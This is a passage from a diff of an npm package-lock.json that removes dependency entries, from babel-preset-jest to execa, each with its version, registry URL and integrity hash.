"^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.23.0", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.23.0.tgz", - "integrity": "sha512-QW8HiM1shhT2GuzkvklfjcKDiWFXHOeFCIA/huJPwHsslwcydgk7X+z2zXpEijP98UCY7HbubZt5J2Zgvf0CaQ==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001587", - "electron-to-chromium": "^1.4.668", - "node-releases": "^2.0.14", - "update-browserslist-db": "^1.0.13" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "dependencies": { - "fast-json-stable-stringify": "2.x" - }, - "engines": { - "node": ">= 6" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001610", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001610.tgz", - "integrity": "sha512-QFutAY4NgaelojVMjY63o6XlZyORPaLfyMnsl3HgnWdJUcX6K0oaJymHjH8PT5Gk7sTm8rvC/c5COUQKXqmOMA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" - } - }, - "node_modules/ci-info": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.2.0.tgz", - "integrity": "sha512-dVqRX7fLUm8J6FgHJ418XuIgDLZDkYcDFTeL6TA2gt5WlIZUQrrH6EZrNClwT/H0FateUsZkGIOPRrLbP+PR9A==", - "dev": true - }, - "node_modules/cjs-module-lexer": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", - "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "node_modules/cosmiconfig": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.1.0.tgz", - "integrity": "sha512-AdmX6xUzdNASswsFtmwSt7Vj8po9IuqXm0UXz7QKPuEUmPB4XyjGfaAr2PSuELMwkRMVH1EpIkX5bTZGRB3eCA==", - "dev": true, - "dependencies": { - "@types/parse-json": "^4.0.0", - "import-fresh": "^3.2.1", - "parse-json": "^5.0.0", - "path-type": "^4.0.0", - "yaml": "^1.10.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - }, - "bin": { - "create-jest": "bin/create-jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.2.tgz", - "integrity": "sha512-mOp8wKcvj7XxC78zLgw/ZA+6TSgkoE2C/ienthhRD298T7UNwAg9diBpLRxC0mOezLl4B0xV7M0cCO6P/O0Xhw==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "peerDependencies": { - "babel-plugin-macros": "^3.1.0" - }, - "peerDependenciesMeta": { - "babel-plugin-macros": { - "optional": true - } - } - }, - "node_modules/deep-is": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.3.tgz", - "integrity": "sha1-s2nW+128E+7PUk+RsHD+7cNXzzQ=", - "dev": true, - "peer": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/doctrine": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", - "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", - "dev": true, - "peer": true, - "dependencies": { - "esutils": "^2.0.2" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/dot-prop": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", - "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", - "dev": true, - "dependencies": { - "is-obj": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "dependencies": { - "jake": "^10.8.5" - }, - "bin": { - "ejs": "bin/cli.js" - }, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.4.737", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.737.tgz", - "integrity": "sha512-QvLTxaLHKdy5YxvixAw/FfHq2eWLUL9KvsPjp0aHK1gI5d3EDuDgITkvj0nFO2c6zUY3ZqVAJQiBYyQP9tQpfw==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/enquirer": { - "version": "2.3.6", - "resolved": "https://registry.npmjs.org/enquirer/-/enquirer-2.3.6.tgz", - "integrity": "sha512-yjNnPr315/FjS4zIsUxYguYUPP2e1NK4d7E7ZOLiyYCcbFBiTMyID+2wvm2w6+pZ/odMA7cRkjhsPbltwBOrLg==", - "dev": true, - "peer": true, - "dependencies": { - "ansi-colors": "^4.1.1" - }, - "engines": { - "node": ">=8.6" - } - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.1.2.tgz", - "integrity": "sha512-ErCHMCae19vR8vQGe50xIsVomy19rg6gFu3+r3jkEO46suLMWBksvVyoGgQV+jOfl84ZSOSlmv6Gxa89PmTGmA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/eslint": { - "version": "7.32.0", - "resolved": "https://registry.npmjs.org/eslint/-/eslint-7.32.0.tgz", - "integrity": "sha512-VHZ8gX+EDfz+97jGcgyGCyRia/dPOd6Xh9yPv8Bl1+SoaIwD+a/vlrOmGRUyOYu7MwUhc7CxqeaDZU13S4+EpA==", - "dev": true, - "peer": true, - "dependencies": { - "@babel/code-frame": "7.12.11", - "@eslint/eslintrc": "^0.4.3", - "@humanwhocodes/config-array": "^0.5.0", - "ajv": "^6.10.0", - "chalk": "^4.0.0", - "cross-spawn": "^7.0.2", - "debug": "^4.0.1", - "doctrine": "^3.0.0", - "enquirer": "^2.3.5", - "escape-string-regexp": "^4.0.0", - "eslint-scope": "^5.1.1", - "eslint-utils": "^2.1.0", - "eslint-visitor-keys": "^2.0.0", - "espree": "^7.3.1", - "esquery": "^1.4.0", - "esutils": "^2.0.2", - "fast-deep-equal": "^3.1.3", - "file-entry-cache": "^6.0.1", - "functional-red-black-tree": "^1.0.1", - "glob-parent": "^5.1.2", - "globals": "^13.6.0", - "ignore": "^4.0.6", - "import-fresh": "^3.0.0", - "imurmurhash": "^0.1.4", - "is-glob": "^4.0.0", - "js-yaml": "^3.13.1", - "json-stable-stringify-without-jsonify": "^1.0.1", - "levn": "^0.4.1", - "lodash.merge": "^4.6.2", - "minimatch": "^3.0.4", - "natural-compare": "^1.4.0", - "optionator": "^0.9.1", - "progress": "^2.0.0", - "regexpp": "^3.1.0", - "semver": "^7.2.1", - "strip-ansi": "^6.0.0", - "strip-json-comments": "^3.1.0", - "table": "^6.0.9", - "text-table": "^0.2.0", - "v8-compile-cache": "^2.0.3" - }, - "bin": { - "eslint": "bin/eslint.js" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/eslint-scope": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-5.1.1.tgz", - "integrity": "sha512-2NxwbF/hZ0KpepYN0cNbo+FN6XoK7GaHlQhgx/hIZl6Va0bF45RQOOwhLIy8lQDbuCiadSLCBnH2CFYquit5bw==", - "dev": true, - "peer": true, - "dependencies": { - "esrecurse": "^4.3.0", - "estraverse": "^4.1.1" - }, - "engines": { - "node": ">=8.0.0" - } - }, - "node_modules/eslint-utils": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/eslint-utils/-/eslint-utils-2.1.0.tgz", - "integrity": "sha512-w94dQYoauyvlDc43XnGB8lU3Zt713vNChgt4EWwhXAP2XkBvndfxF0AgIqKOOasjPIPzj9JqgwkwbCYD0/V3Zg==", - "dev": true, - "peer": true, - "dependencies": { - "eslint-visitor-keys": "^1.1.0" - }, - "engines": { - "node": ">=6" - }, - "funding": { - "url": "https://github.com/sponsors/mysticatea" - } - }, - "node_modules/eslint-utils/node_modules/eslint-visitor-keys": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", - "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/eslint-visitor-keys": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-2.1.0.tgz", - "integrity": "sha512-0rSmRBzXgDzIsD6mGdJgevzgezI534Cer5L/vyMX0kHzT/jiB43jRhd9YUlMGYLQy2zprNmoT8qasCGtY+QaKw==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/espree": { - "version": "7.3.1", - "resolved": "https://registry.npmjs.org/espree/-/espree-7.3.1.tgz", - "integrity": "sha512-v3JCNCE64umkFpmkFGqzVKsOT0tN1Zr+ueqLZfpV1Ob8e+CEgPWa+OxCoGH3tnhimMKIaBm4m/vaRpJ/krRz2g==", - "dev": true, - "peer": true, - "dependencies": { - "acorn": "^7.4.0", - "acorn-jsx": "^5.3.1", - "eslint-visitor-keys": "^1.3.0" - }, - "engines": { - "node": "^10.12.0 || >=12.0.0" - } - }, - "node_modules/espree/node_modules/eslint-visitor-keys": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-1.3.0.tgz", - "integrity": "sha512-6J72N8UNa462wa/KFODt/PJ3IU60SDpC3QXC1Hjc1BXXpfL2C9R5+AU7jhe0F6GREqVMh4Juu+NY7xn+6dipUQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4" - } - }, - "node_modules/esprima": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", - "dev": true, - "bin": { - "esparse": "bin/esparse.js", - "esvalidate": "bin/esvalidate.js" - }, - "engines": { - "node": ">=4" - } - }, - "node_modules/esquery": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/esquery/-/esquery-1.4.0.tgz", - "integrity": "sha512-cCDispWt5vHHtwMY2YrAQ4ibFkAL8RbH5YGBnZBc90MolvvfkkQcJro/aZiAQUlQ3qgrYS6D6v8Gc5G5CQsc9w==", - "dev": true, - "peer": true, - "dependencies": { - "estraverse": "^5.1.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/esquery/node_modules/estraverse": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.2.0.tgz", - "integrity": "sha512-BxbNGGNm0RyRYvUdHpIwv9IWzeM9XClbOxwoATuFdOE7ZE6wHL+HQ5T8hoPM+zHvmKzzsEqhgy0GrQ5X13afiQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/esrecurse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/esrecurse/-/esrecurse-4.3.0.tgz", - "integrity": "sha512-KmfKL3b6G+RXvP8N1vr3Tq1kL/oCFgn2NYXEtqP8/L3pKapUA4G8cFVaoF3SU323CD4XypR/ffioHmkti6/Tag==", - "dev": true, - "peer": true, - "dependencies": { - "estraverse": "^5.2.0" - }, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/esrecurse/node_modules/estraverse": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-5.2.0.tgz", - "integrity": "sha512-BxbNGGNm0RyRYvUdHpIwv9IWzeM9XClbOxwoATuFdOE7ZE6wHL+HQ5T8hoPM+zHvmKzzsEqhgy0GrQ5X13afiQ==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/estraverse": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/estraverse/-/estraverse-4.3.0.tgz", - "integrity": "sha512-39nnKffWz8xN1BU/2c79n9nB9HDzo0niYUqx6xyqUnyoAnQyyWpOTdZEeiCch8BBu515t4wp9ZmgVfVhn9EBpw==", - "dev": true, - "peer": true, - "engines": { - "node": ">=4.0" - } - }, - "node_modules/esutils": { - "version": "2.0.3", - "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", - "integrity": "sha512-kVscqXk4OCp68SZ0dkgEKVi6/8ij300KBWTJq32P/dYeWTSwK41WyTxalN1eRmA5Z9UU/LX9D7FWSmV9SAYx6g==", - "dev": true, - "peer": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/execa": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", - "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", - "dev": true, - "dependencies": { - "cross-spawn": "^7.0.3", - "get-stream": "^6.0.0", - "human-signals": "^2.1.0", - "is-stream": "^2.0.0", - "merge-stream": "^2.0.0", - "npm-run-path": 